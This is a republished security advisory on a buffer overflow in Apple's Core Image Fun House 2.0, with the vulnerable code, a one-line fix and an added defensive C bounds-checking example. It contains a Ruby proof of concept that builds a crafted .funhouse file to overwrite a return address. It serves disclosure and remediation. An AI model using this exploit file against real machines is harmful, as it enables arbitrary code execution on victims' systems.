Apple Core Image Fun House <= 2.0 OS X -- Arbitrary Code Execution

2008.07.16
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

*************************** NETRAGARD ADVISORY ***********************
http://www.netragard.com
"We make IT Safe"

[Advisory Summary]
----------------------------------------------------------------------
Advisory Author       : Adriel T. Desautels
Researcher            : Kevin Finisterre
Advisory ID           : NETRAGARD-20070628
Product Name          : Core Image Fun House
Product Version       : <= 2.0 OS X
Vendor Name           : http://www.apple.com
Type of Vulnerability : Buffer Overflow
Effort (1-10 where 1 == easy) : 5
Impact                : Arbitrary Code Execution
Vendor Notified       : Yes
Patch Released        : N/A
Discovery Date        : 07/10/2007

[POSTING NOTICE]
----------------------------------------------------------------------
If you intend to post this advisory on your web-site you must provide a
clickable link back to http://www.netragard.com as the contents of this
advisory may be updated without notice.

[Product Description]
----------------------------------------------------------------------
"From creating new solutions for print, photography, scientific
visualization, and film post-production to enhancing your application's
user interface with innovative and effortless visual effects, Core Image
performs the heavy lifting that enables the next generation of imaging
applications."
-- http://developer.apple.com/macosx/coreimage.html --

[Technical Summary]
----------------------------------------------------------------------
It is possible to trigger an exploitable buffer overflow condition by
creating a specially crafted .funhouse file.

[Technical Details]
----------------------------------------------------------------------
The Funhouse application does not properly parse XML data. Specifically,
it is possible to create a specially crafted .funhouse file that will
trigger and exploit a buffer overflow condition. The code responsible for
the condition is as follows:

// render origin handles using AppKit directly
- (CIImage *)drawPoints:(CIImage *)im
{
    ...
    NSString *str, *str2, *localizedParameter;
    ...
    else if ([type isEqualToString:@"image"])
    {
        // image effect stack element
        // show an image origin (in its center)
        CGRect r = [[es imageAtIndex:i] extent];
        NSPoint offset = [es offsetAtIndex:i];
        pt.x = offset.x + (r.origin.x + r.size.width * 0.5);
        pt.y = offset.y + (r.origin.y + r.size.height * 0.5);
        str = [[es filenameAtIndex:i] stringByAppendingString:@" center"];
        [self drawPoint:pt label:str intoContext:cg];
    }
}

The following code is called by the code referenced above:

/*
    Drawing
*/
// draw an onscreen handle for an image origin, text origin, or filter point
// the handle is a "center symbol" - a circle with crosshairs through it.
// the handle is labelled with the string "str".
// all items are "shadowed"
- (void)drawPoint:(NSPoint)pt label:(NSString *)str intoContext:(CGContextRef)cg
{
    ...
    char cstr[256];
    ...
    if (!movingNow)
    {
        [str getCString:cstr];    <-- Vulnerability Exists Here

[Fix]
----------------------------------------------------------------------
To fix the issue, [str getCString:cstr]; needs to be replaced with
[str getCString:cstr maxLength:254]; to prevent overflows.

- [str getCString:cstr];
+ [str getCString:cstr maxLength:254];

[Proof Of Concept]
----------------------------------------------------------------------
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. adriel (at) netragard (dot) com [email concealed]
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7: 'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
# CFPropertyListCreateFromXMLData(): plist parse failed;
# the data is not proper UTF-8. The file name for this data
# could be: $
# /Users/test/Desktop/SuperTastey.funhouse/file.xml
# The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# \x80-\xFF range that do not form proper utf8

len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d   # There are lots of filtered chars!

if File.exist?(fname + ".funhouse/file.xml")
  File.unlink(fname + ".funhouse/file.xml")
  Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")

FUNSTUFF = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
  "<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +
  "<plist version=\"1.0\">" +
  "<dict>" +
  "<key>layers</key>" +
  "<array>" +
  "<dict>" +
  "<key>file</key>" +
  "<string>" + "Z" * len + [retaddr].pack("V") + "</string>" +
  "<key>offsetX</key>" +
  "<real>0.0</real>" +
  "<key>offsetY</key>" +
  "<real>0.0</real>" +
  "<key>type</key>" +
  "<string>image</string>" +
  "</dict>" +
  "<dict>" +
  "<key>classname</key>" +
  "<string>CIGlassDistortion</string>" +
  "<key>type</key>" +
  "<string>filter</string>" +
  "<key>values</key>" +
  "<dict>" +
  "<key>inputCenter_CIVectorValue</key>" +
  "<string>[150 150]</string>" +
  "<key>inputScale</key>" +
  "<real>200</real>" +
  "<key>inputTexture</key>" +
  "<string>" + "Z" * 50000 + "</string>" +
  "</dict>" +
  "</dict>" +
  "</array>" +
  "</dict>" +
  "</plist>" + "\n"

target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f|
  f.print(FUNSTUFF)   # weeeeee... lets have fun.
  f.close
}

[Vendor Status]
----------------------------------------------------------------------
Vendor Notified

[Vendor Comments]
----------------------------------------------------------------------
This issue is addressed in Xcode tools 3.1. Credit to Kevin Finisterre of
Netragard for reporting this issue to Apple. Further information is
available at: http://support.apple.com/kb/HT1222

[Disclaimer]
----------------------http://www.netragard.com------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.
http://www.netragard.com
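The defect in drawPoint: is a fixed 256-byte stack buffer filled by an unbounded copy of an attacker-controlled label (the layer filename from file.xml plus the literal " center"), and the [Fix] section replaces it with a bounded copy. The following C example is added here and is not Netragard's or Apple's code: it mirrors that pattern in plain C, measures whether a given filename would overflow the advisory's 256-byte buffer, and shows a bounded build of the label that reports truncation to the caller instead of silently shortening it (the advisory's maxLength:254 fix truncates silently). The function names, the "sunset.jpg" filename and the 300-byte filename (the same length the PoC uses) are constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Size of the on-stack label buffer in the advisory's drawPoint: (char cstr[256]). */
#define LABEL_BUF_SIZE 256
/* Suffix appended to the layer filename in drawPoints: before the copy. */
#define CENTER_SUFFIX " center"

/* Bytes the finished label occupies, including the terminating NUL: this is
 * exactly how much an unbounded copy such as getCString: writes into cstr. */
size_t label_bytes_needed(const char *filename)
{
    return strlen(filename) + strlen(CENTER_SUFFIX) + 1;
}

/* True if copying the label for `filename` into a LABEL_BUF_SIZE buffer
 * would write past its end (the condition the advisory describes). */
bool label_would_overflow(const char *filename)
{
    return label_bytes_needed(filename) > LABEL_BUF_SIZE;
}

/* Hardened equivalent of the bounded copy: never writes more than dst_size
 * bytes and always NUL-terminates. Returns 0 on success and -1 when the label
 * did not fit, so the caller can log or reject the layer rather than draw a
 * silently shortened label. On -1, dst still holds a truncated, terminated
 * label (hypothetical helper, not part of Core Image Fun House). */
int build_label_bounded(char *dst, size_t dst_size, const char *filename)
{
    if (dst == NULL || dst_size == 0)
        return -1;
    int n = snprintf(dst, dst_size, "%s%s", filename, CENTER_SUFFIX);
    if (n < 0 || (size_t)n >= dst_size)
        return -1;          /* output was truncated to dst_size - 1 bytes */
    return 0;
}

int main(void)
{
    /* Constructed samples: an ordinary filename and a 300-byte one, matching
     * the "Z" * 300 length used by the advisory's proof of concept. */
    char long_name[301];
    memset(long_name, 'Z', 300);
    long_name[300] = '\0';
    const char *names[] = { "sunset.jpg", long_name };

    char cstr[LABEL_BUF_SIZE];
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        int rc = build_label_bounded(cstr, sizeof cstr, names[i]);
        printf("filename length %zu: label needs %zu bytes, overflow=%s, bounded copy %s\n",
               strlen(names[i]), label_bytes_needed(names[i]),
               label_would_overflow(names[i]) ? "yes" : "no",
               rc == 0 ? "ok" : "truncated");
    }
    return 0;
}
```

The 300-byte filename needs 308 bytes for its label, 52 more than the buffer holds; the bounded version stops at 255 bytes plus the terminator and returns -1, which is the signal the original code lacked.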

References:

http://www.securityfocus.com/archive/1/archive/1/494230/100/0/threaded
http://www.milw0rm.com/exploits/6043
http://support.apple.com/kb/HT2352


Copyright 2024, cxsecurity.com
